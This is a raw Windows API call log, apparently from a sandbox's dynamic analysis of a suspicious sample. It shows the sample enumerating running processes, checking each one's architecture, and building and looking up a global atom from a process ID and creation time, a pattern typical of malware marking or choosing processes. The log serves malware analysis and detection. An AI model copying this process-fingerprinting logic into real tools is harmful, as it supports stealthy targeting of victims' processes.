	[0085.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x397e9b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0085.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x6a0
	[0085.422] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.422] CloseHandle (hObject=0x6a0) returned 1
	[0085.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x397ea88, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0085.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x6a0
	[0085.423] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.423] CloseHandle (hObject=0x6a0) returned 1
	[0085.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x396ea50, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0085.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x6a0
	[0085.423] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.423] CloseHandle (hObject=0x6a0) returned 1
	[0085.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x397e8c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0085.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x6a0
	[0085.423] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.423] CloseHandle (hObject=0x6a0) returned 1
	[0085.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0085.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0085.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x397ea88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0085.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x6a0
	[0085.424] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.424] CloseHandle (hObject=0x6a0) returned 1
	[0085.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x397e8c0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0085.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x6a0
	[0085.424] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.424] CloseHandle (hObject=0x6a0) returned 1
	[0085.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0085.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x6a0
	[0085.424] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.424] CloseHandle (hObject=0x6a0) returned 1
	[0085.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x396eb30, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0085.425] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0085.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x397e9f8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0085.425] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x6a0
	[0085.425] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.425] CloseHandle (hObject=0x6a0) returned 1
	[0085.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x396eab0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0085.425] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x6a0
	[0085.425] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.425] CloseHandle (hObject=0x6a0) returned 1
	[0085.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x76c8f0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0085.425] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x6a0
	[0085.426] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.426] CloseHandle (hObject=0x6a0) returned 1
	[0085.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x396e770, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0085.426] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x6a0
	[0085.426] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.426] CloseHandle (hObject=0x6a0) returned 1
	[0085.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39a19c0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0085.426] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x6a0
	[0085.426] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.426] CloseHandle (hObject=0x6a0) returned 1
	[0085.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x396ea50, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0085.426] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x6a0
	[0085.426] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.427] CloseHandle (hObject=0x6a0) returned 1
	[0085.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x397ea88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0085.427] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x6a0
	[0085.427] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.427] CloseHandle (hObject=0x6a0) returned 1
	[0085.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x397ea88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0085.427] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x6a0
	[0085.427] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.427] CloseHandle (hObject=0x6a0) returned 1
	[0085.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x396e750, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0085.427] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x6a0
	[0085.427] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.427] CloseHandle (hObject=0x6a0) returned 1
	[0085.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x396ea50, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0085.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x6a0
	[0085.428] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.428] CloseHandle (hObject=0x6a0) returned 1
	[0085.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x397e9b0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0085.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x6a0
	[0085.428] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.428] CloseHandle (hObject=0x6a0) returned 1
	[0085.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x397e9b0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0085.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x6a0
	[0085.428] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.428] CloseHandle (hObject=0x6a0) returned 1
	[0085.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39a1880, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0085.429] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x6a0
	[0085.429] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.429] CloseHandle (hObject=0x6a0) returned 1
	[0085.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x397eab8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0085.429] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x6a0
	[0085.429] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.429] CloseHandle (hObject=0x6a0) returned 1
	[0085.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x397e8c0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0085.429] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x6a0
	[0085.429] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.429] CloseHandle (hObject=0x6a0) returned 1
	[0085.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x396eb30, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0085.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x6a0
	[0085.430] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.430] CloseHandle (hObject=0x6a0) returned 1
	[0085.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x397e8c0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0085.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x6a0
	[0085.430] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.430] CloseHandle (hObject=0x6a0) returned 1
	[0085.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x396ea50, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0085.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x6a0
	[0085.430] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.430] CloseHandle (hObject=0x6a0) returned 1
	[0085.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39a1b28, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0085.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x6a0
	[0085.430] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.430] CloseHandle (hObject=0x6a0) returned 1
	[0085.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39a1b78, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0085.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x6a0
	[0085.431] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.431] CloseHandle (hObject=0x6a0) returned 1
	[0085.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x397e9b0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0085.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x6a0
	[0085.431] GetLastError () returned 0x5
	[0085.431] GetLastError () returned 0x5
	[0085.431] GetLastError () returned 0x5
	[0085.431] GetLastError () returned 0x5
	[0085.431] GetLastError () returned 0x5
	[0085.431] GetLastError () returned 0x5
	[0085.431] GetLastError () returned 0x5
	[0085.431] GetLastError () returned 0x5
	[0085.431] GetLastError () returned 0x5
	[0085.431] GetLastError () returned 0x5
	[0085.431] GetLastError () returned 0x5
	[0085.431] GetLastError () returned 0x5
	[0085.431] GetLastError () returned 0x5
	[0085.431] GetLastError () returned 0x5
	[0085.431] GetLastError () returned 0x5
	[0085.432] GetLastError () returned 0x5
	[0085.432] GetLastError () returned 0x5
	[0085.432] GetLastError () returned 0x5
	[0085.432] GetLastError () returned 0x5
	[0085.432] GetLastError () returned 0x5
	[0085.432] GetLastError () returned 0x5
	[0085.432] GetLastError () returned 0x5
	[0085.432] GetLastError () returned 0x5
	[0085.432] GetLastError () returned 0x5
	[0085.432] GetLastError () returned 0x5
	[0085.432] GetLastError () returned 0x5
	[0085.432] GetLastError () returned 0x5
	[0085.432] GetLastError () returned 0x5
	[0085.432] GetLastError () returned 0x5
	[0085.432] GetLastError () returned 0x5
	[0085.432] GetLastError () returned 0x5
	[0085.432] GetLastError () returned 0x5
	[0085.432] GetLastError () returned 0x5
	[0085.432] GetLastError () returned 0x5
	[0085.432] GetLastError () returned 0x5
	[0085.432] GetLastError () returned 0x5
	[0085.432] GetLastError () returned 0x5
	[0085.432] GetLastError () returned 0x5
	[0085.432] GetLastError () returned 0x5
	[0085.432] GetLastError () returned 0x5
	[0085.432] GetLastError () returned 0x5
	[0085.432] GetLastError () returned 0x5
	[0085.432] GetLastError () returned 0x5
	[0085.432] GetLastError () returned 0x5
	[0085.432] GetLastError () returned 0x5
	[0085.432] GetLastError () returned 0x5
	[0085.432] GetLastError () returned 0x5
	[0085.432] GetLastError () returned 0x5
	[0085.432] GetLastError () returned 0x5
	[0085.432] GetLastError () returned 0x5
	[0085.432] GetLastError () returned 0x5
	[0085.432] GetLastError () returned 0x5
	[0085.432] GetLastError () returned 0x5
	[0085.432] GetLastError () returned 0x5
	[0085.432] GetLastError () returned 0x5
	[0085.432] GetLastError () returned 0x5
	[0085.432] GetLastError () returned 0x5
	[0085.432] GetLastError () returned 0x5
	[0085.433] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0085.433] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0085.433] GetProcessTimes (in: hProcess=0x6a0, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0085.433] GetLastError () returned 0x5
	[0085.433] GetLastError () returned 0x5
	[0085.433] GetLastError () returned 0x5
	[0085.433] GetLastError () returned 0x5
	[0085.433] GetLastError () returned 0x5
	[0085.433] GetLastError () returned 0x5
	[0085.433] GetLastError () returned 0x5
	[0085.433] GetLastError () returned 0x5
	[0085.433] GetLastError () returned 0x5
	[0085.433] GetLastError () returned 0x5
	[0085.433] GetLastError () returned 0x5
	[0085.433] GetLastError () returned 0x5
	[0085.433] GetLastError () returned 0x5
	[0085.433] GetLastError () returned 0x5
	[0085.433] GetLastError () returned 0x5
	[0085.433] GetLastError () returned 0x5
	[0085.433] GetLastError () returned 0x5
	[0085.433] GetLastError () returned 0x5
	[0085.433] GetLastError () returned 0x5
	[0085.433] GetLastError () returned 0x5
	[0085.433] GetLastError () returned 0x5
	[0085.433] GetLastError () returned 0x5
	[0085.433] GetLastError () returned 0x5
	[0085.433] GetLastError () returned 0x5
	[0085.433] GetLastError () returned 0x5
	[0085.433] GetLastError () returned 0x5
	[0085.433] wsprintfA (in: param_1=0x3976208, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0085.434] GetLastError () returned 0x5
	[0085.434] GetLastError () returned 0x5
	[0085.434] GetLastError () returned 0x5
	[0085.434] GetLastError () returned 0x5
	[0085.434] GetLastError () returned 0x5
	[0085.434] GetLastError () returned 0x5
	[0085.434] GetLastError () returned 0x5
	[0085.434] GetLastError () returned 0x5
	[0085.434] GetLastError () returned 0x5
	[0085.434] GetLastError () returned 0x5
	[0085.434] GetLastError () returned 0x5
	[0085.434] GetLastError () returned 0x5
	[0085.434] GetLastError () returned 0x5
	[0085.434] GetLastError () returned 0x5
	[0085.434] GetLastError () returned 0x5
	[0085.434] GetLastError () returned 0x5
	[0085.434] GetLastError () returned 0x5
	[0085.434] GetLastError () returned 0x5
	[0085.434] GetLastError () returned 0x5
	[0085.434] GetLastError () returned 0x5
	[0085.434] GetLastError () returned 0x5
	[0085.434] GetLastError () returned 0x5
	[0085.434] GetLastError () returned 0x5
	[0085.434] GetLastError () returned 0x5
	[0085.434] GetLastError () returned 0x5
	[0085.434] GetLastError () returned 0x5
	[0085.434] GetLastError () returned 0x5
	[0085.434] GetLastError () returned 0x5
	[0085.434] GetLastError () returned 0x5
	[0085.434] GetLastError () returned 0x5
	[0085.434] GetLastError () returned 0x5
	[0085.434] GetLastError () returned 0x5
	[0085.434] GetLastError () returned 0x5
	[0085.434] GetLastError () returned 0x5
	[0085.434] GetLastError () returned 0x5
	[0085.434] GetLastError () returned 0x5
	[0085.434] GetLastError () returned 0x5
	[0085.434] GetLastError () returned 0x5
	[0085.435] GetLastError () returned 0x5
	[0085.435] GetLastError () returned 0x5
	[0085.435] GetLastError () returned 0x5
	[0085.435] GetLastError () returned 0x5
	[0085.435] GetLastError () returned 0x5
	[0085.435] GetLastError () returned 0x5
	[0085.435] GetLastError () returned 0x5
	[0085.435] GetLastError () returned 0x5
	[0085.435] GetLastError () returned 0x5
	[0085.435] GetLastError () returned 0x5
	[0085.435] GetLastError () returned 0x5
	[0085.435] GetLastError () returned 0x5
	[0085.435] GetLastError () returned 0x5
	[0085.435] GetLastError () returned 0x5
	[0085.435] GetLastError () returned 0x5
	[0085.435] GetLastError () returned 0x5
	[0085.435] GetLastError () returned 0x5
	[0085.435] GetLastError () returned 0x5
	[0085.435] GetLastError () returned 0x5
	[0085.435] GetLastError () returned 0x5
	[0085.435] GetLastError () returned 0x5
	[0085.435] GetLastError () returned 0x5
	[0085.435] GetLastError () returned 0x5
	[0085.435] GetLastError () returned 0x5
	[0085.435] GetLastError () returned 0x5
	[0085.435] GetLastError () returned 0x5
	[0085.435] GetLastError () returned 0x5
	[0085.435] GetLastError () returned 0x5
	[0085.435] GetLastError () returned 0x5
	[0085.435] GetLastError () returned 0x5
	[0085.435] GetLastError () returned 0x5
	[0085.435] GetLastError () returned 0x5
	[0085.435] GetLastError () returned 0x5
	[0085.435] GetLastError () returned 0x5
	[0085.435] GetLastError () returned 0x5
	[0085.435] GetLastError () returned 0x5
	[0085.435] GetLastError () returned 0x5
	[0085.435] GetLastError () returned 0x5
	[0085.435] GetLastError () returned 0x5
	[0085.435] GetLastError () returned 0x5
	[0085.436] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0085.436] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0085.436] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0085.436] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0085.436] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0085.436] CloseHandle (hObject=0x6a0) returned 1
	[0085.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0085.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x397ea88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0085.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0085.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e9b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0085.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x6a0
	[0085.437] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.437] CloseHandle (hObject=0x6a0) returned 1
	[0085.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x397ea88, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0085.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0085.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x397e8c0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0085.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe6c) returned 0x6a0
	[0085.438] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.438] CloseHandle (hObject=0x6a0) returned 1
	[0085.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tmp8C77.tmp", cchWideChar=11, lpMultiByteStr=0x397e9b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmp8C77.tmp", lpUsedDefaultChar=0x0) returned 11
	[0085.595] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x17118) returned 0xc0000004
	[0085.604] VirtualAlloc (lpAddress=0x0, dwSize=0x17218, flAllocationType=0x3000, flProtect=0x4) returned 0x3bf0000
	[0085.604] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3bf0000, Length=0x17218, ResultLength=0x0 | out: SystemInformation=0x3bf0000, ResultLength=0x0) returned 0x0
	[0085.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0085.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0085.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0085.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0085.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
